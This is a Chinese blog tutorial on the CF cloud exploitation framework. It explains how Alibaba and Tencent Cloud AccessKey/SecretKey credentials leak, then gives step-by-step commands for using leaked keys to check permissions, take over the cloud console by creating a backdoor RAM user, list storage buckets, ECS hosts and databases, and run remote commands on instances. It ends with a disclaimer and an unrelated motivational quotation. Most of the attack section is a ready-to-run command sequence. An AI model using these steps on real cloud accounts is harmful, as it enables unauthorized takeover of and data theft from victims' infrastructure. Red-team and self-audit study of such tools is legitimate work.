云资产管理之CF利用框架
文章目录
-
-
- 一、介绍
- 二、泄露方式
- 三、CF框架简介
- 四、使用方法:AK/SK泄露
- 五、腾讯云-使用过程
- 六、阿里云-使用过程
-
- 配置密钥
- 访问控制
- 对象存储
- 弹性计算服务(ecs)
- 云数据库
- 最后删除
- 免责声明
- 摘抄
-
一、介绍
首先认识下阿里云官方解释的什么是AccessKey:
在调用阿里云API时您需要使用AccessKey完成身份验证。
AccessKey包括AccessKey ID和AccessKey Secret,需要一起使用。具体如下:
AccessKey ID:用于标识用户。
AccessKey Secret:用于验证用户的密钥。AccessKey Secret必须保密。
- 云主机通过使用
Access Key Id / Secret Access Key加密的方法来验证某个请求的发送者身份。 Access Key Id(AK)用于标示用户,Secret Access Key(SK)是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥,其中SK必须保密。AK/SK原理使用对称加解密。
云主机接收到用户的请求后,系统将使用AK对应的相同的SK和同样的认证机制生成认证字符串,并与用户请求中包含的认证字符串进行比对。
如果认证字符串相同,系统认为用户拥有指定的操作权限,并执行相关操作;
如果认证字符串不同,系统将忽略该操作并返回错误码。
在使用云服务 API 进行访问时,用户需要提供其 AK 和 SK,以便进行身份验证。
这些凭证用于证明用户的身份,并授权用户执行特定的操作,如创建、管理和访问云资源,例如虚拟机实例、存储桶、数据库等。
Access Key 和Secret Key的组合是敏感信息,类似于用户名和密码的组合,需要妥善保管和保密。
如果 AK 或 SK 泄露,未经授权的人可能会使用它们来访问和操作用户的云资源,导致数据泄露、资源滥用或其他安全风险。
二、泄露方式
- 1、
硬编码产生泄露例如将AK/SK硬编码到程序代码/配置文件中,攻击者只需要对小程序包进行反编译即可获取AK/SK。 - 2、
安全意识单薄&存储手段缺失最直白的如硬编码到业务代码中并上传github,其次也有明文配置到配置文件并在日志中任意打印,或者明文保存在代码库、配置文件、公开可访问的存储桶、版本控制系统中,这些都可能被攻击者获取。 - 3、
AK/SK业务隔离手段缺失,比如多个业务共有一对AKSK,这样任何一个业务造成的AKSK泄露都会导致其他业务受影响。比如Bucket允许任意文件上传和读取、bucket允许匿名访问、bucket允许列出文件、bucket允许盲上传 - 4、
AK/SK安全分发手段缺失,比如直接通过微信、企业微信等即时通讯工具对AK/SK口口相传等等
三、CF框架简介
CF 是一个云环境利用框架,适用于在红队场景中对云上内网进行横向、SRC 场景中对 Access Key 即访问凭证的影响程度进行判定、企业场景中对自己的云上资产进行自检等等。
当前已支持阿里云、腾讯云、AWS和华为云。
四、使用方法:AK/SK泄露
大部分的云主机都支持AK/SK都认证方式,用于API调用等功能,由于开发的不规范,以及一些其它漏洞,可能会导致AK/SK泄露。在渗透中,如果发现目标泄露了AK/SK,可以通过AK/SK直接攻击其对应的云服务器。
五、腾讯云-使用过程
1、访问配置,输入AccessKey
键盘上下键选择云服务商后回车,然后程序会提示输入访问密钥别名,以及输入访问密钥 ID (Input Access Key Id)、输入同样的Access Key Id值即可;回车后输入Access Key Secret;再次回车,直接输入optiona即可配置完成。
2、输入以下命令可查看当前获取的腾讯云服务器的权限
cf tencent perm
3、接管控制台
接管控制台的时候默认会创建一个名称为 crossfire 的用户,如果想改成其他用户名可以使用 -u 参数
接管控制台需要当前访问凭证至少拥有 AliyunRAMFullAccess 权限。
cf tencent console
4、进行登陆
六、阿里云-使用过程
配置密钥
1、访问配置,输入AccessKey
在配置凭证的时候 Access Key ID 和 Access Key Secret 参数是必填的,
注意:只有当配置临时访问凭证时,才需要填 STS Token 参数,这个不是临时的,所以直接回车就可以。
2、查看凭证
cf config ls
cf config ls -a
使用 ls 命令列出配置的时候,如果配置内容过长,这时输出内容会进行部分省略展示,如果想列出凭证的全部内容,可以使用 -a 或者--all命令。
3、一键接管控制台
cf alibaba console 接管控制台的时候默认会创建一个名称为 crossfire 的用户,如果想改成其他用户名可以使用 -u 参数
cf alibaba console -u testqwe 接管控制台需要当前访问凭证至少拥有 AliyunRAMFullAccess 权限。
访问控制
1、登陆控制台
https://signin.aliyun.com
testqwe@xxxxxxx8
axxxxxxxxx
2、查看当前 qwetest 用户所拥有的权限
可以看到是 AdministratorAccess 即管理所有阿里云资源的权限(RAM用户)
3、 一键列出阿里云的凭证权限
cf alibaba perm
4、列出信息
cf alibaba ls
终通过 CF 列出这个 AK 里有 0 个存储桶以及100+多台云服务主机。
对象存储
1、列出阿里云 OSS 对象存储服务
cf alibaba oss ls
cf alibaba oss ls -n 100 指定获取对象的数量,可以使用 -n 或者 --number 参数
2、 列出存储桶里的对象
cf alibaba oss obj ls
cf alibaba oss obj ls -n 100
弹性计算服务(ecs)
1、使用以下命令列出 ECS 弹性计算服务
cf alibaba ecs ls
2、指定实例,可以使用 -i 或者 --instanceID 参数
cf alibaba ecs ls -i i-xxxxxxxx
3、执行单行命令
cf alibaba ecs exec -c whoami -i i-2ze8mflaq9vt9m4hz7rw
云数据库
1、列出阿里云 RDS 云数据库服务
cf alibaba rds ls
cf alibaba rds ls -a 使用-a 命令,会列出数据库实例的详细信息
最后删除
cf alibaba console cancel 取消控制台接管
cf config del 删除配置密钥
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!
摘抄
很认可这样一句话:“人生最好的状态,莫过于有事做、有人爱、有所期待。”
很多人之所以能越活越优秀,都因心中葆有热爱,让他们可以全身心地投入工作和生活,并从中找到属于自我的意义和价值。
对于生活而言,热爱无疑是治愈迷茫最好的解药。
它会赋予你能量,赐予你热情,吸引你不断去探寻生命的更多可能性。
心有热爱,眼中自有光芒。
愿接下来的日子,你能找到所热爱的事,并为之全力以赴,活成自己喜欢的样子。
----《告别迷茫,找到热爱》